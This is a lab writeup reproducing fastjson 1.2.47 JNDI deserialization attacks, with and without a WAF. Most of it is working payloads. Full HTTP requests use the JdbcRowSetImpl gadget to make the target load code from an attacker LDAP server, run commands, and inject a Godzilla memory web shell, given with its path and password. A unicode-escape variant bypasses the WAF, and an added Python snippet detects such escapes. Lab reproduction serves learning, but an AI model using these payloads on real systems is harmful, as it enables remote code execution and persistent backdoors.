fastjson vulnerability reproduction - 1247 - jndi

01-1247-jndi

Vulnerability Exploitation

Reference: https://github.com/lemono0/FastJsonPart

This writeup focuses on reproducing the process in order to understand the exploitation flow. There are many excellent articles by experts online, but they are not detailed enough for foundational learning (especially on how to compile Java files in IDEA, how to resolve dependency issues, and so on -__-|), so I am writing down my own reproduction process.

Start the environment, access the site, and capture the login package.

Remove the closing brace of the JSON body to trigger a parse error.

Use a DNS log (out-of-band DNS callback) to check whether the vulnerability is present.

{
  "@type":"java.net.Inet4Address",
  "val":"9dny9mz50wyzzxt8yyg9mk2kkbq2es2h.oastify.com"
}

Use the error message to detect the fastjson version.

{
  "@type": "java.lang.AutoCloseable"

Start the JNDI server.

java -jar .\JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.80.53

Use the TomcatBypass query format.

ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho

Send the following payload.

POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 280
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
cmd: whoami

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.53:1389/TomcatBypass/TomcatEcho",
        "autoCommit":true
    }
}

Inject a Godzilla memory shell.

POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 286
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.53:1389/TomcatBypass/GodzillaMemshell",
        "autoCommit":true
    }
}

Payload:

ldap://0.0.0.0:1389/TomcatBypass/GodzillaMemshell /bteam.ico pass1024

02-1247-jndi-waf

Start the environment, access the site, and capture the login package.

Remove the closing brace to trigger an error, which shows that the server parses the JSON body.

Adding an extra double quote also returns an error message.

Probe for the exact fastjson version; this request is filtered.

{
  "@type": "java.lang.AutoCloseable"

Fastjson decodes hex (\x) and unicode (\u) escape sequences inside JSON strings, so a payload that the WAF filters in plain form can be rewritten with these escapes to get past the filter.

{
  "\u0040\u0074\u0079\u0070\u0065": "\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0043\u006C\u006F\u0073\u0065\u0061\u0062\u006C\u0065"

Run with JDK 8.

Use the generic payload.

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.245:1389/TomcatBypass/TomcatEcho",
        "autoCommit":true
    }
}

The same payload with unicode-escaped keys and values:

{
    "a":{
        "\u0040\u0074\u0079\u0070\u0065":"\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0043\u006C\u0061\u0073\u0073",
        "\u0076\u0061\u006C":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C"
    },
    "b":{
        "\u0040\u0074\u0079\u0070\u0065":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C",
        "\u0064\u0061\u0074\u0061\u0053\u006F\u0075\u0072\u0063\u0065\u004E\u0061\u006D\u0065":"\u006C\u0064\u0061\u0070\u003A\u002F\u002F\u0031\u0039\u0032\u002E\u0031\u0036\u0038\u002E\u0038\u0030\u002E\u0032\u0034\u0035\u003A\u0031\u0033\u0038\u0039\u002F\u0054\u006F\u006D\u0063\u0061\u0074\u0042\u0079\u0070\u0061\u0073\u0073\u002F\u0054\u006F\u006D\u0063\u0061\u0074\u0045\u0063\u0068\u006F",
        "\u0061\u0075\u0074\u006F\u0043\u006F\u006D\u006D\u0069\u0074":"\u0074\u0072\u0075\u0065"
    }
}
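
As an added example (not code from the original post or the referenced repository), the following Python shows why a WAF rule that matches the literal text @type misses the escaped payload above, and how decoding escapes before matching catches both the plain and the encoded form. The sample bodies are constructed to mirror the requests in this writeup, with LDAP-HOST as a placeholder; the \xHH form is handled on the assumption, stated in the text above, that fastjson accepts it.

```python
import re

# Escapes fastjson accepts inside a string literal: standard \uXXXX, its
# non-standard \xHH (as the text above states), and single-char escapes.
_ESC = re.compile(r'\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\(.)', re.S)
_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
_SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "b": "\b", "f": "\f"}

# Gadget class names used in this writeup; a real rule set is longer.
DENY_CLASSES = {"com.sun.rowset.JdbcRowSetImpl", "java.lang.Class"}
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://")

def unescape(raw: str) -> str:
    """Decode escapes as fastjson's lexer does: \\u0040... becomes @type."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 16))
        return _SIMPLE.get(m.group(3), m.group(3))
    return _ESC.sub(repl, raw)

def string_literals(body: str) -> list:
    """(raw, decoded) for every string literal; regex-based so the deliberately
    unclosed version probe above is still inspected."""
    return [(m.group(1), unescape(m.group(1))) for m in _STRING.finditer(body)]

def inspect(body: str) -> dict:
    """What a normalising WAF rule flags in one request body."""
    lits = string_literals(body)
    decoded = [d for _, d in lits]
    hits = {
        "autotype_key": "@type" in decoded,
        "denied_class": sorted(set(decoded) & DENY_CLASSES),
        "jndi_url": any(d.lower().startswith(JNDI_SCHEMES) for d in decoded),
        # True when the match only succeeded because of the decoding step
        "used_escapes": any("\\u" in r or "\\x" in r for r, _ in lits),
    }
    hits["block"] = bool(hits["autotype_key"] or hits["denied_class"] or hits["jndi_url"])
    return hits

# Constructed request bodies mirroring the ones above (LDAP-HOST is a placeholder).
PLAIN = ('{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
         '"dataSourceName":"ldap://LDAP-HOST:1389/x","autoCommit":true}}')
ENCODED = ('{"b":{"\\u0040\\u0074\\u0079\\u0070\\u0065":'
           '"\\u0063\\u006F\\u006D\\u002E\\u0073\\u0075\\u006E\\u002E\\u0072\\u006F\\u0077\\u0073\\u0065\\u0074\\u002E\\u004A\\u0064\\u0062\\u0063\\u0052\\u006F\\u0077\\u0053\\u0065\\u0074\\u0049\\u006D\\u0070\\u006C"}}')
PROBE = '{"@type": "java.lang.AutoCloseable"'   # unclosed on purpose, like the probe above
BENIGN = '{"username":"alice","password":"hunter2"}'
```

Calling inspect() on ENCODED reports the same autotype key and denied class as PLAIN, with used_escapes set, which is exactly the case a literal-match rule misses.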

Execute the command.

Inject the Godzilla memory shell.

{
    "a":{
        "\u0040\u0074\u0079\u0070\u0065":"\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0043\u006C\u0061\u0073\u0073",
        "\u0076\u0061\u006C":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C"
    },
    "b":{
        "\u0040\u0074\u0079\u0070\u0065":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C",
        "\u0064\u0061\u0074\u0061\u0053\u006F\u0075\u0072\u0063\u0065\u004E\u0061\u006D\u0065":"\u006C\u0064\u0061\u0070\u003A\u002F\u002F\u0031\u0039\u0032\u002E\u0031\u0036\u0038\u002E\u0038\u0030\u002E\u0032\u0034\u0035\u003A\u0031\u0033\u0038\u0039\u002F\u0054\u006F\u006D\u0063\u0061\u0074\u0042\u0079\u0070\u0061\u0073\u0073\u002F\u0047\u006F\u0064\u007A\u0069\u006C\u006C\u0061\u004D\u0065\u006D\u0073\u0068\u0065\u006C\u006C",
        "\u0061\u0075\u0074\u006F\u0043\u006F\u006D\u006D\u0069\u0074":"\u0074\u0072\u0075\u0065"
    }
}

Connect with Godzilla.

http://192.168.80.53/bteam.ico
pass1024